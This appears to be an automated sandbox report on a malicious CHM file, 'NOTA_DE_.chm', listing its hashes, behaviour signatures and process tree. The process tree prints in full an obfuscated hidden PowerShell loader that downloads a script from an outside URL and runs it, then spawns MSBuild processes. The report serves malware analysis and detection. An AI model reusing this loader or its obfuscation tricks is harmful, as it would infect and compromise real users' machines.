Analysis
-
max time kernel
29s -
max time network
35s -
platform
windows7_x64 -
resource
win7-20230220-es -
resource tags
arch:x64arch:x86image:win7-20230220-eslocale:es-esos:windows7-x64systemwindows -
submitted
04-05-2023 18:41
Static task
static1
Behavioral task
behavioral1
Sample
NOTA_DE_.chm
Resource
win7-20230220-es
Behavioral task
behavioral2
Sample
NOTA_DE_.chm
Resource
win10v2004-20230220-es
General
-
Target
NOTA_DE_.chm
-
Size
17KB
-
MD5
bb8f93b0d3d4705f5b392c86eb874026
-
SHA1
a966e0c6a9089cb0d2109bcf3f0af6259a9b40e0
-
SHA256
5a883d1a6f91650bdf834da1d2f95e7c02f1898dc4f9a4fed59c4b2c40b62f6d
-
SHA512
89547138d769841ea014d5623bc007bfb668b1b4d140d9c087311484f0457aebd83cc340c2d2275d7388e1cff405f572ea886be62318b810b874d858a2ebb042
-
SSDEEP
192:IGureT0FDCkUUKZB2FvC5bjlb/bbxR4imW4xBq34Pof:IGureT0FKUUB4alZbbbxRmNB3Pof
Malware Config
Extracted
https://mailink.app/K72.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1448 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1448 powershell.exe 1448 powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 1448 powershell.exe Token: SeIncreaseQuotaPrivilege 1448 powershell.exe Token: SeSecurityPrivilege 1448 powershell.exe Token: SeTakeOwnershipPrivilege 1448 powershell.exe Token: SeLoadDriverPrivilege 1448 powershell.exe Token: SeSystemProfilePrivilege 1448 powershell.exe Token: SeSystemtimePrivilege 1448 powershell.exe Token: SeProfSingleProcessPrivilege 1448 powershell.exe Token: SeIncBasePriorityPrivilege 1448 powershell.exe Token: SeCreatePagefilePrivilege 1448 powershell.exe Token: SeBackupPrivilege 1448 powershell.exe Token: SeRestorePrivilege 1448 powershell.exe Token: SeShutdownPrivilege 1448 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeSystemEnvironmentPrivilege 1448 powershell.exe Token: SeRemoteShutdownPrivilege 1448 powershell.exe Token: SeUndockPrivilege 1448 powershell.exe Token: SeManageVolumePrivilege 1448 powershell.exe Token: 33 1448 powershell.exe Token: 34 1448 powershell.exe Token: 35 1448 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 596 hh.exe 596 hh.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 596 wrote to memory of 1448 596 hh.exe 29 PID 596 wrote to memory of 1448 596 hh.exe 29 PID 596 wrote to memory of 1448 596 hh.exe 29 PID 1448 wrote to memory of 2028 1448 powershell.exe 32 PID 1448 wrote to memory of 2028 1448 powershell.exe 32 PID 1448 wrote to memory of 2028 1448 powershell.exe 32 PID 1448 wrote to memory of 2028 1448 powershell.exe 32 PID 1448 wrote to memory of 1772 1448 powershell.exe 36 PID 1448 wrote to memory of 1772 1448 powershell.exe 36 PID 1448 wrote to memory of 1772 1448 powershell.exe 36 PID 1448 wrote to memory of 1772 1448 powershell.exe 36 PID 1448 wrote to memory of 1244 1448 powershell.exe 35 PID 1448 wrote to memory of 1244 1448 powershell.exe 35 PID 1448 wrote to memory of 1244 1448 powershell.exe 35 PID 1448 wrote to memory of 1244 1448 powershell.exe 35 PID 1448 wrote to memory of 1656 1448 powershell.exe 34 PID 1448 wrote to memory of 1656 1448 powershell.exe 34 PID 1448 wrote to memory of 1656 1448 powershell.exe 34 PID 1448 wrote to memory of 1656 1448 powershell.exe 34 PID 1448 wrote to memory of 1776 1448 powershell.exe 33 PID 1448 wrote to memory of 1776 1448 powershell.exe 33 PID 1448 wrote to memory of 1776 1448 powershell.exe 33 PID 1448 wrote to memory of 1776 1448 powershell.exe 33
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\NOTA_DE_.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mailink.app/K72.txt')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:2028
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1776
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1656
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1244
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1772
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81